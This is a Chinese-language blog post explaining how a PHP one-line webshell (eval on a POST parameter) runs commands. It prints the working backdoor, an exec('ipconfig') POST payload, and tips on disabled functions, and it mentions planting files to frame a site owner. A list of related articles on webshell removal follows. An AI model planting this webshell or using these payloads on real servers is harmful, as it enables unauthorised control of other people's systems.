一句话木马(webshell)是如何执行命令的

简介:

     

在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。


首先我们先看一个原始而又简单的php一句话木马。

<?php @eval($_POST['cmd']); ?>

看到这里不得不赞美前辈的智慧。


对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一眼就是密码是cmd,通过post提交数据,但是具体如何执行的,却不得而知,下面我们分析一句话是如何执行的。


这句话什么意思呢?

php的代码要写在<?php  ?>里面,服务器才能认出来这是php代码,然后才去解析。

@符号的意思是不报错。

例如:

1
2
3
<?php
eval ($_POST[cmd]);
?>

如果没有@,如下图,就会报错

wKioL1lDPU6wkqlpAAFTGLvgyDI589.png-wh_50


为什么呢?

因为一个变量没有定义,就被拿去使用了,

服务器就善意的提醒:Notice,你的xxx变量没有定义。

这不就暴露了密码吗?

所以加上@

为什么pw是密码呢?


那就要来理解这句话的意思了

php里面几个超全局变量

$_GET、$_POST就是其中之一

$_POST['a'];

意思就是a这个变量,用post的方法接收。

(传输数据的两种方法,get、post,post是在消息体存放数据,get是在消息头的url路径里存放数据(例如xxx.php?a=2))

eval()

把字符串作为PHP代码执行

例如:eval("echo 'a'");其实就等于直接 echo 'a';

再来看看<?php eval($_POST['pw']); ?>

首先,用post方式接收变量pw,比如接收到了:pw=echo 'a';

这时代码就变成<?php eval("echo 'a';"); ?>

结果:

wKioL1lDPYHheDqUAACKGr0cbR0209.png-wh_50


连起来意思就是:

用post方法接收变量pw,把变量pw里面的字符串当做php代码来执行

所以也就能这么玩:


也就是说,你想执行什么代码,就把什么代码放进变量pw里,用post传输给一句话木马

你想查看目标硬盘里有没有小黄片,可以用php函数:opendir()和readdir()等等

想上传点小黄片,诬陷站主,就用php函数:move_uploaded_file,当然相应的html要写好

你想执行cmd命令,则用exec()

当然前提是:

php配置文件php.ini里,关掉安全模式safe_mode = off,

然后在看看 禁用函数列表 disable_functions = proc_open, popen, exec, system, shell_exec ,把exec去掉,确保没有exec。

(有些cms为了方便处理某些功能,会去掉的)

看看效果:

POST代码如下:

1
2
3
4
5
cmd=header( "Content-type:text/html;charset=gbk" );
exec ( "ipconfig" ,$out);
echo  '<pre>' ;
print_r($out);
echo  '</pre>' ;

wKioL1lDPauzQBUkAAEhsqpAJK4196.png-wh_50


在这里我们可以看到系统直接执行了系统命令,

SO,大家现在应该理解,为什么说一句话短小精悍了吧!


我们在看一下一句话在菜刀之类的webshell管理工具里面是如何一句话是如何执行的

其实在webshell管理工具里面,已经集成好了所有可以执行的系统命令,我们只需要输入ifconfig、ipconfig、whoami、net user 等系统命令,就可以获得对应的系统信息。


wKioL1lDPeOjV78oAAEFI0QJX-M137.jpg-wh_50


其实可以很明显看明白,其实执行的命令就和我们前面写的哪样进行输入输出,执行系统命令操作。

所以只要webshell有足够高的权限,可以做任何你想做的事情。




     本文转自Tar0 51CTO博客,原文链接:http://blog.51cto.com/tar0cissp/1937364,如需转载请自行联系原作者



相关文章
|
云安全 SQL 弹性计算
阿里云提示网站后门发现后门(Webshell)文件的解决办法
2018年10月27日接到新客户网站服务器被上传了webshell脚本木马后门问题的求助,对此我们sine安全公司针对此阿里云提示的安全问题进行了详细分析,ECS服务器被阿里云提示异常网络连接-可疑WebShell通信行为,还会伴有,网站后门-发现后门(Webshell)文件,以及提示网站后门-一句话webshell的安全提示,但是大部分都是单独服务器ECS的用户,具体被阿里云提示的截图如下:
2749 1
阿里云提示网站后门发现后门(Webshell)文件的解决办法
|
10月前
|
开发框架 Java .NET
Webshell不能执行命令常见原因
Webshell不能执行命令常见原因
305 1
|
2月前
|
安全 数据安全/隐私保护
webshell后门分析
webshell后门分析
54 3
|
2月前
|
安全 数据安全/隐私保护
webshell菜刀后门分析
webshell菜刀后门分析
25 1
|
10月前
|
安全 API 网络安全
绕过IIS命令执行防护提权
绕过IIS命令执行防护提权
111 0
|
SQL 缓存 弹性计算
阿里云提示网站后门发现后门(Webshell)文件该怎么解决
阿里云提示网站后门发现后门(Webshell)文件该怎么解决
2229 0
阿里云提示网站后门发现后门(Webshell)文件该怎么解决
|
XML Web App开发 安全
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
|
运维 安全 Linux
SSH木马后门如何从服务器中查找
关于SSH后门木马查杀,那SSH协议其实它是一个加密的网络传输协议,通常咱们使用它作为Linux管理使用,那它用来传输命令界面和远程执行命令,也就是咱们现在看到的这个界面,通常计算机被入侵之后,如果这个计算机是暴露在外网的,或者是横向打穿了某一台服务器,以另一台服务器作为跳板跳到其他服务器上。一般来说,通过SSH登陆会非常的方便操作命令这个时候是不是就有后门的诞生了。
160 0
SSH木马后门如何从服务器中查找
|
SQL Windows
1433映像劫持后门提权
首先: 1.服务器开启了终端端口(终端端口未必是3389,可以自行查询) 2.服务器的粘滞键功能无损,只要可以正常弹出即可 3.
905 0
|
存储 安全 关系型数据库
webshell网站木马文件后门如何根据特征删除
Webshell实际上是一个能够执行恶意功能的PHP代码文件。Webshell要执行恶意功能,其代码结构主要由两部分组成:数据传递部分和数据执行部分。在webshell中,数据传递部分是指webshell中用来接收外部输入数据的部分,webshell可以根据外部输入数据动态地交互执行恶意功能。在webshell中,数据执行部分指的是webshell中的system函数,用于执行代码执行和执行命令等命令。
366 0
webshell网站木马文件后门如何根据特征删除